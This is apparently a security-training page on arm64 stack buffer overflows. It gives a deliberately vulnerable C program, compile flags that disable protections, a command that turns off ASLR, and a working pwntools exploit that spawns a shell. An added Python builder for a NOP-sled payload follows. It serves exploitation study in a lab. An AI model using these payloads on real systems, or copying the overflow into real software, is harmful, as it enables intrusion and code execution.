Stack Shellcode - arm64
{{#include ../../../banners/hacktricks-training.md}}
Find an introduction to arm64 in:
{{#ref}} ../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md {{#endref}}
Linux
Code
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability: up to 256 bytes into a 64-byte buffer
}
int main() {
vulnerable_function();
return 0;
}
Compile without PIE, without a stack canary and without NX (executable stack):
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
No ASLR & No canary - Stack Overflow
To disable ASLR system-wide run:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To find the offset of the bof check this link. For this binary it is 72 bytes: the 64-byte buffer, then the 8-byte saved x29, then the saved x30 (return address) that gets overwritten.
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to the saved return address (x30): 64-byte buffer + 8-byte saved x29
offset = 72
# Stack address right after the overwritten return address, where the shellcode lands
# (found with gdb / the core dump; only valid while ASLR is disabled)
ret_address = p64(0xfffffffff1a0)
# Craft the payload: padding, new return address, then the shellcode it points to
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
The only "difficult" thing to find here is the address on the stack to jump to. In my case I generated the exploit with the address I found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
I opened the generated core file (gdb ./bof ./core) and checked the real address of the start of the shellcode.
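The address problem just described is usually handled by not depending on one exact stack address. The following is an added example (not part of the original page and not the exploit above): a small pwntools-free payload builder that prepends an arm64 NOP sled to the shellcode and computes how far the real stack may drift from the address seen in gdb before the jump misses. It assumes the layout of this page (offset 72 to the saved x30, the `read()` cap of 256 bytes) and uses a single `brk #0` instruction as a stand-in for the real shellcode, which you would replace with `asm(shellcraft.sh())`.

```python
import struct

# arm64 NOP (encoding 0xD503201F) as it appears in memory, little-endian.
ARM64_NOP = bytes.fromhex("1f2003d5")

# Stand-in for the shellcode: one arm64 `brk #0` (0xD4200000). It only marks
# where the sled ends; swap in asm(shellcraft.sh()) for a real run.
PLACEHOLDER_SHELLCODE = bytes.fromhex("000020d4")


def build_payload(offset, ret_target, shellcode, sled_instrs, max_len=256):
    """Build 'A'*offset + overwritten x30 + NOP sled + shellcode.

    offset      : bytes from the start of buffer to the saved x30 (72 here:
                  64-byte buffer + 8-byte saved x29).
    ret_target  : value written over x30; should point into the sled, which
                  starts 8 bytes past the saved-x30 slot.
    sled_instrs : number of 4-byte NOPs placed in front of the shellcode.
    max_len     : size passed to read() in the vulnerable function; bytes
                  beyond it never reach the stack.
    """
    if ret_target % 4:
        raise ValueError("arm64 PC must be 4-byte aligned: 0x%x" % ret_target)
    payload = b"A" * offset + struct.pack("<Q", ret_target)
    payload += ARM64_NOP * sled_instrs + shellcode
    if len(payload) > max_len:
        raise ValueError("payload is %d bytes, read() only copies %d"
                         % (len(payload), max_len))
    return payload


def sled_start(buffer_addr, offset):
    """Address of the first NOP, given where `buffer` really sits on the stack."""
    return buffer_addr + offset + 8


def lands_in_sled(buffer_addr, ret_target, offset, sled_instrs):
    """True if, with `buffer` at buffer_addr, the overwritten x30 lands on an
    instruction boundary inside the sled (or exactly on the shellcode)."""
    start = sled_start(buffer_addr, offset)
    end = start + 4 * sled_instrs
    return start <= ret_target <= end and (ret_target - start) % 4 == 0


def tolerated_buffer_addrs(ret_target, offset, sled_instrs):
    """Inclusive range [lo, hi] of real buffer addresses for which the jump
    still hits the sled. Only downward drift is tolerated: if the stack moves
    up, ret_target falls into the padding or the x30 slot and execution dies."""
    hi = ret_target - offset - 8          # sled starts exactly at ret_target
    lo = hi - 4 * sled_instrs             # ret_target hits the shellcode itself
    return lo, hi


if __name__ == "__main__":
    # Address used in the exploit above, with a 32-instruction (128-byte) sled.
    target = 0xfffffffff1a0
    payload = build_payload(72, target, PLACEHOLDER_SHELLCODE, 32)
    lo, hi = tolerated_buffer_addrs(target, 72, 32)
    print("payload length:", len(payload))
    print("works while buffer is in [0x%x, 0x%x]" % (lo, hi))
```

Because the jump only survives the stack moving to lower addresses, aim `ret_target` at the middle of the sled rather than its start when the address comes from gdb: the stack under the debugger (extra environment variables, different auxv) is rarely at exactly the same place as in a plain run, and a sled on both sides of the guess covers drift in either direction.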
macOS
Tip
It is not possible to disable NX on macOS arm64: the write-xor-execute policy is enforced below the process (Apple Silicon does not allow a page to be writable and executable at the same time), so there is no equivalent of `-z execstack` and you won't find examples with shellcode on the stack on macOS.
Check a macOS ret2win example in:
{{#ref}} ../ret2win/ret2win-arm64.md {{#endref}}